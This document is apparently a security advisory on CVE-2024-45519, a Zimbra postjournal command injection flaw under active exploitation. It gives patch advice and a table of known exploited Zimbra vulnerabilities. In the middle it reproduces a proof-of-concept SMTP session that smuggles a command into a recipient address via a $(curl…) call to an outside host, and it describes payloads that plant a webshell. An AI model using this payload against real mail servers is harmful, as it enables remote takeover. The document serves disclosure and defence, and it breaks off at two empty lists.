A critical vulnerability (CVE-2024-45519) in Zimbra’s postjournal service that allows unauthenticated remote command execution is under active attack.
The vulnerability allows unsanitized user input to be passed to popen, enabling attackers to inject arbitrary commands.
Patched versions add input sanitization and replace popen with execvp to mitigate the direct command injection vulnerability. Zimbra administrators should also check the configuration of the mynetworks parameter to prevent external exploitation.
Patched versions include these versions and newer:
One IP that has been identified as a source of malicious emails and exploit attempts is 79.124.49[.]86.
Exploitation began after ProjectDiscovery researchers reported a Proof of Concept (PoC) for the vulnerability.
The researchers reversed the postjournal binary and found that there were no calls to execvp or the run_command function. Instead, a direct call to popen was made in the read_maps function, allowing input to be passed without sanitization. The cmd argument passed to popen in double quotes would prevent command injection with simple shell metacharacters, but that control could be bypassed with $() syntax.
The postjournal service was then exploited via port 10027 with the following SMTP commands:
EHLO localhost
MAIL FROM: <[email protected]>
RCPT TO: <“aabbb$(curl${IFS}oast.me)”@mail.domain.com>
DATA
Test message
.
The same exploit over SMTP port 25 required the postjournal service to be enabled, which was accomplished with a Bash script:
zmlocalconfig -e postjournal_enabled=true
zmcontrol restart
To enable remote exploit, the researchers found that the mynetworks default configuration included a /20 CIDR range of their public IP address, which could allow the exploit to be performed remotely if the postjournal service is enabled and the attacker is within the allowed network range.
Proofpoint researchers have observed the vulnerability under exploitation, with spoofing emails sent to fake addresses in CC fields to try to get Zimbra servers to parse and execute them as commands. The addresses contained base64 strings that are executed with the sh utility.
Some of the emails used CC’d addresses in an attempt to build a webshell on a vulnerable Zimbra server. The full CC list is wrapped as a string, and if connected, the base64 blobs decode to a command to write a webshell to /jetty/webapps/zimbraAdmin/public/jsp/zimbraConfig.jsp (see image below).
Once installed, the webshell listens for inbound connections and also has support for command execution via exec or download and execute over a socket connection.
Zimbra is a popular target of cyber threat actors, and CISA already includes several critical vulnerabilities in the Zimbra Product Suite in its Known Exploited Vulnerabilities catalog:
cveID | vendorProject | product | vulnerabilityName |
CVE-2023-37580 | Zimbra | Collaboration (ZCS) | Zimbra Collaboration (ZCS) Cross-Site Scripting (XSS) Vulnerability |
CVE-2022-27926 | Zimbra | Collaboration (ZCS) | Zimbra Collaboration (ZCS) Cross-Site Scripting (XSS) Vulnerability |
CVE-2022-41352 | Zimbra | Collaboration (ZCS) | Zimbra Collaboration (ZCS) Arbitrary File Upload Vulnerability |
CVE-2022-27925 | Zimbra | Collaboration (ZCS) | Zimbra Collaboration (ZCS) Arbitrary File Upload Vulnerability |
CVE-2022-37042 | Zimbra | Collaboration (ZCS) | Zimbra Collaboration (ZCS) Authentication Bypass Vulnerability |
CVE-2022-27924 | Zimbra | Collaboration (ZCS) | Zimbra Collaboration (ZCS) Command Injection Vulnerability |
CVE-2018-6882 | Zimbra | Collaboration Suite (ZCS) | Zimbra Collaboration Suite (ZCS) Cross-Site Scripting (XSS) Vulnerability |
CVE-2022-24682 | Zimbra | Webmail | Zimbra Webmail Cross-Site Scripting Vulnerability |
While CVE-2024-45519 hasn’t been officially reported yet, Cyble data already shows more than 50,000 web-exposed Zimbra servers with unpatched earlier critical vulnerabilities. It remains to be seen how many will be exposed to the latest vulnerability.
All Zimbra administrators should: